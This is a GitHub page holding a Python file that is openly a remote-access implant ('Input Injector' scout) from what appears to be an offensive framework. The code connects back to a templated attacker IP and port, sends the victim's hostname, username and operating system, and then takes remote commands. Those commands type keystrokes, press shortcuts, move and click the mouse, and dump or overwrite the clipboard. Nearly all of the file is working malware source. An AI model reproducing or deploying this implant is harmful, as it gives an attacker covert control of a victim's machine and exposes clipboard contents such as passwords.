-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathlin_injection_payload.py
256 lines (240 loc) · 10.6 KB
/
lin_injection_payload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
import socket, pickle, pyautogui, os, clipboard
from platform import platform
from getpass import getuser
from time import sleep
port = !!!!!
ip_addr = @@@@@
lkey = #####
End = $$$$$
skey = %%%%%
time_to_sleep = ^^^^^
type_of_scout = 'Input Injector'
try:
operating_sys = platform()
except:
operating_sys = '?????'
try:
hostname = socket.gethostname()
except:
hostname = '?????'
try:
username = getuser()
except:
username = '?????'
userinfo = hostname + '/' + username
scout_data = [skey, lkey, userinfo, type_of_scout, operating_sys]
s = None
pyautogui.FAILSAFE = False
valid_keys = ['\\t', '\\n', '\\r', ' ', '!', '"', '#', '$', '%', '&', "'", '(',
')', '*', '+', ',', '-', '.', '/', '0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', ':', ';', '<', '=', '>', '?', '@', '[', '\\', ']', '^', '_', '`',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',
'accept', 'add', 'alt', 'altleft', 'altright', 'apps', 'backspace',
'browserback', 'browserfavorites', 'browserforward', 'browserhome',
'browserrefresh', 'browsersearch', 'browserstop', 'capslock', 'clear',
'convert', 'ctrl', 'ctrlleft', 'ctrlright', 'decimal', 'del', 'delete',
'divide', 'down', 'end', 'enter', 'esc', 'escape', 'execute', 'f1', 'f10',
'f11', 'f12', 'f13', 'f14', 'f15', 'f16', 'f17', 'f18', 'f19', 'f2', 'f20',
'f21', 'f22', 'f23', 'f24', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9',
'final', 'fn', 'hanguel', 'hangul', 'hanja', 'help', 'home', 'insert', 'junja',
'kana', 'kanji', 'launchapp1', 'launchapp2', 'launchmail',
'launchmediaselect', 'left', 'modechange', 'multiply', 'nexttrack',
'nonconvert', 'num0', 'num1', 'num2', 'num3', 'num4', 'num5', 'num6',
'num7', 'num8', 'num9', 'numlock', 'pagedown', 'pageup', 'pause', 'pgdn',
'pgup', 'playpause', 'prevtrack', 'print', 'printscreen', 'prntscrn',
'prtsc', 'prtscr', 'return', 'right', 'scrolllock', 'select', 'separator',
'shift', 'shiftleft', 'shiftright', 'sleep', 'space', 'stop', 'subtract', 'tab',
'up', 'volumedown', 'volumemute', 'volumeup', 'win', 'winleft', 'winright', 'yen',
'command', 'option', 'optionleft', 'optionright']
help_menu = '''\nInput Injector Menu
====================
Global Commands :
banner Display a banner
clear Clear the screen
help Show the help menu
local <shell command> Locally execute a shell command
python Enter the system python interpreter
quit Quit the framework
Connection commands :
disconnect Make the scout disconnect and try to reconnect
terminate Kill the scout process
sleep <seconds> Disconnect the scout and make it sleep for some time
Handler commands :
back Move back to scout handler
Key Injection commands :
pr <key> Press a key
sh <keys separated with spaces> Use a keyboard shortcut
ty <string> Type out a string
valids Show all valid keys to use on target
Mouse Injection commands :
click_left Click the left mouse button
click_right Click the right mouse button
move_to <X cord> <Y cord> Move mouse to XY coordinates on screen
Clipboard commands :
clip_clear Clear clipboard content
clip_dump Show clipboard content
clip_set <string> Edit/set the clipboard content
Screen command :
dimensions Get the dimensions/size of screen in terms of XY
position Get current mouse position on screen in terms of XY coordinates\n'''
def recvall(tar_socket):
tar_socket.settimeout(None)
data = tar_socket.recv(9999)
if not data:
return ''
while True:
if data.endswith(End):
try:
tar_socket.settimeout(1)
more_data = tar_socket.recv(9999)
if not more_data:
return data[:-len(End)]
data += more_data
except (socket.timeout,socket.error):
tar_socket.settimeout(None)
return data[:-len(End)]
else:
more_data = tar_socket.recv(9999)
data += more_data
def inject_input(injection_type, arg):
try:
if injection_type == 'ty':
if not arg:
s.sendall('[-]Supply a key as an arg'+End)
return
pyautogui.typewrite(arg)
s.sendall('[+]Injected typewritten character/s' + End)
elif injection_type == 'pr':
if not arg:
s.sendall('[-]Supply a key as an arg'+End)
return
pyautogui.press(arg)
s.sendall('[+]Injected pressed key' + End)
elif injection_type == 'sh':
if not arg:
s.sendall('[-]Supply a key as an arg'+End)
return
if ' ' in arg:
arg = arg.split(' ')
for key in arg:
pyautogui.keyDown(key)
for key in reversed(arg):
pyautogui.keyUp(key)
s.sendall('[+]Injected keyboard shortcut' + End)
else:
pyautogui.hotkey(arg)
s.sendall('[+]Injected keyboard shortcut' + End)
elif injection_type == 'valids':
tar_list = '|/'.join(valid_keys)
s.sendall(tar_list + End)
elif injection_type == 'click_left':
pyautogui.click(button='left')
s.sendall('[+]Injected left mouse click' + End)
elif injection_type == 'click_right':
pyautogui.click(button='right')
s.sendall('[+]Injected right mouse click' + End)
elif injection_type == 'move_to':
if not arg:
s.sendall('[-]Supply a key as an arg'+End)
return
try:
arg = arg.split(' ')
cord_one = int(arg[0])
cord_two = int(arg[1])
pyautogui.moveTo(x=cord_one, y=cord_two)
s.sendall('[+]Injected mouse movement' + End)
except:
s.sendall('[-]Input X and Y coordinates as integers' + End)
return
elif injection_type == 'dimensions':
dimensions = pyautogui.size()
dimensions = '[+]Dimensions of screen : ' + str(dimensions[0]) + ' x ' + str(dimensions[1])
s.sendall(dimensions + End)
elif injection_type == 'position':
current = pyautogui.position()
current = '[+]Current mouse position : ' + str(current[0]) + ' x ' + str(current[1])
s.sendall(current + End)
elif injection_type == 'clip_clear':
clipboard.copy('')
s.sendall('[+]Cleared clipboard content' + End)
elif injection_type == 'clip_dump':
clipboard_data = clipboard.paste()
if not clipboard_data:
s.sendall('[+]Clipboard content is empty' + End)
return
s.sendall('[+]Dumped content : ' + clipboard_data + End)
elif injection_type == 'clip_set':
if not arg:
s.sendall('[-]Input a string' + End)
return
clipboard.copy(arg)
s.sendall('[+]Injected cliboard data' + End)
else:
s.sendall('[-]Unknown command "' + injection_type + '", run "help" for help menu' + End)
except Exception as e:
s.sendall('[-]Error injecting keystrokes : ' + str(e))
def main():
global s, shell_type
while True:
while True:
try:
s = socket.socket()
s.connect((ip_addr, port))
break
except:
sleep(time_to_sleep)
continue
s.sendall(pickle.dumps(scout_data) + End)
while True:
try:
#s.settimeout(None)
data = recvall(s)
command = data.split(' ', 1)[0]
if command == 'help':
s.sendall(help_menu+End)
elif command == 'disconnect':
s.sendall('[*]Disconnecting...' + End)
sleep(5)
break
elif command == 'terminate':
s.sendall('[*]Terminating scout...' + End)
os._exit(1)
elif command == 'sleep':
try:
sleep_time = int(data.split(' ')[1])
except:
s.sendall('[-]Please specify an integer as the sleep duration' + End)
continue
s.sendall('[*]Scout going offline for : ' + str(sleep_time) + ' seconds' + End)
s.shutdown(1)
s.close()
for i in range(sleep_time):
sleep(1)
break
elif command == 'ping':
s.sendall('[+]Scout is alive' + End)
else:
arg = data.split(' ', 1)
if len(arg) > 1:
inject_input(command, arg[1])
else:
inject_input(command, None)
except (socket.error, socket.timeout):
try:
s.shutdown(1)
s.close()
break
except socket.error:
break
except Exception as e:
try:
if command:
s.sendall('[-]Error, last run command : ' + command + '. Error message : ' + str(e) + End)
else:
s.sendall('[-]Error message : ' + str(e) + End)
except:
s.shutdown(1)
s.close()
break
main()